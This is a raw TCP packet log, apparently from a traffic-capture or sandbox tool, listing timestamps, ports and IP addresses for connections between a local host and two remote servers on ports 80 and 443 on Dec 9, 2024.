Dec 9, 2024 08:08:26.533699036 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.534707069 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.534828901 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.534872055 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.535840988 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.535892010 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.535964966 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.536067009 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.536994934 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.538753033 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.667817116 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.667958975 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.668138027 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.668392897 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.668442011 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.668514967 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.669461012 CET	443	49814	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:26.669537067 CET	49814	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:26.669586897 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.669615030 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.669637918 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.669691086 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.670665026 CET	49814	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:26.670671940 CET	443	49814	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:26.670680046 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.670736074 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.670788050 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.670850039 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.670892954 CET	443	49814	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:26.670897961 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.671907902 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.672003984 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.672056913 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.672127008 CET	49814	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:26.672257900 CET	49814	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:26.672291040 CET	443	49814	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:26.672352076 CET	49814	443	192.168.2.4	104.21.16.9
Dec 9, 2024 08:08:26.672362089 CET	443	49814	104.21.16.9	192.168.2.4
Dec 9, 2024 08:08:26.673126936 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.673250914 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.673304081 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.674252033 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.674298048 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.674380064 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.675424099 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.675465107 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.675467968 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.676065922 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.676609039 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.676721096 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.676769018 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.677781105 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.677920103 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.677968025 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.678944111 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.678989887 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.679074049 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.679219007 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.680126905 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.680171013 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.680227041 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.680274010 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.681288958 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.681334972 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.681375980 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.681426048 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.682451963 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.682502031 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.682601929 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.682646990 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.683634043 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.683686018 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.683746099 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.683789015 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.685022116 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.685070992 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.685072899 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.685120106 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.686024904 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.686070919 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.686109066 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.686156988 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.687167883 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.687211990 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.687271118 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.687318087 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.688313961 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.688379049 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.688466072 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.688512087 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.689477921 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.689521074 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.689583063 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.689641953 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.690661907 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.690706968 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.690752029 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.690795898 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.691824913 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.691875935 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.691957951 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.692003012 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.693003893 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.693049908 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.693113089 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.693157911 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.694236040 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.694278955 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.694308043 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.694351912 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.695338011 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.695385933 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.695451021 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.695493937 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.696532011 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.696578979 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.696634054 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.696680069 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.697715998 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.697778940 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.697817087 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.697860003 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.698869944 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.698934078 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.698961020 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.699006081 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.700016975 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.700063944 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.700129032 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.700169086 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.701240063 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.701283932 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.701340914 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.701385975 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.702395916 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.702441931 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.702523947 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.702563047 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.703541994 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.703588963 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.703648090 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.703690052 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.704732895 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.704776049 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.704813004 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.704850912 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.705915928 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.705959082 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.705980062 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.706022978 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.707143068 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.707182884 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.707185984 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.707217932 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.708252907 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.708297014 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.708365917 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.708409071 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.709450960 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.709512949 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.709542990 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.709584951 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.710608959 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.710655928 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.710686922 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.710737944 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.711771011 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.711813927 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.711872101 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.711916924 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.712954044 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.712994099 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.713067055 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.713108063 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.714135885 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.714179993 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.714323044 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.714368105 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.715291023 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.715329885 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.715405941 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.715457916 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.716495037 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.716533899 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.716603041 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.716646910 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.717623949 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.717665911 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.717813969 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.717855930 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.718808889 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.718852043 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.718935013 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.718976021 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.719969988 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.720035076 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.720088959 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.720133066 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.721162081 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.721204996 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.721204996 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.721246004 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.722306967 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.722351074 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.722407103 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.722449064 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.723493099 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.723540068 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.723579884 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.723633051 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.724661112 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.724704981 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.724740028 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.724781036 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.725855112 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.725898981 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.725934982 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.725977898 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.727035046 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.727078915 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.727102995 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.727147102 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.728185892 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.728226900 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.728288889 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.728331089 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.729274988 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.729320049 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.860356092 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.860428095 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.860483885 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.860810041 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.861053944 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.861100912 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.861968040 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.862011909 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.862042904 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.863142014 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.863193035 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.863236904 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.864067078 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.864301920 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.864408016 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.864454985 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.865468979 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.865528107 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.865576029 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.866627932 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.866755009 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.866806030 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.867836952 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.867939949 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.867991924 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.868969917 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.869019032 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.869024992 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.869060993 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.870222092 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.870266914 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.870302916 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.870585918 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.871387005 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.871438026 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.871494055 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.871582031 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.872473001 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.872570992 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.872613907 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.873682022 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.873739004 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.873774052 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.873807907 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.874841928 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.874895096 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.874931097 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.874969959 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.875996113 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.876029968 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.876153946 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.877245903 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.877290964 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.877296925 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.877922058 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.878367901 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.878418922 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.878418922 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.878454924 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.879509926 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.879565954 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.879617929 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.879667044 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.880709887 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.880757093 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.880814075 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.880856037 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.881937027 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.881984949 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.882014036 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.882057905 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.883032084 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.883163929 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.883225918 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.884222031 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.884330034 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.884382963 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.885385990 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.885432959 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.885509014 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.885648012 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.886549950 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.886667013 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.886710882 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.887738943 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.887784004 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.887819052 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.887862921 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.888887882 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.889007092 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.889071941 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.890070915 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.890213966 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.890264988 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.891352892 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.891402960 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.891433001 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.891489029 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.892415047 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.892460108 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.892499924 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.892724037 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.893671989 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.893743038 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.893786907 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.894762039 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.894862890 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.894906998 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.895905018 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.896039963 CET	80	49807	185.215.113.16	192.168.2.4
Dec 9, 2024 08:08:26.896065950 CET	49807	80	192.168.2.4	185.215.113.16
Dec 9, 2024 08:08:26.896090984 CET	49807	80	192.168.2.4	185.215.113.16
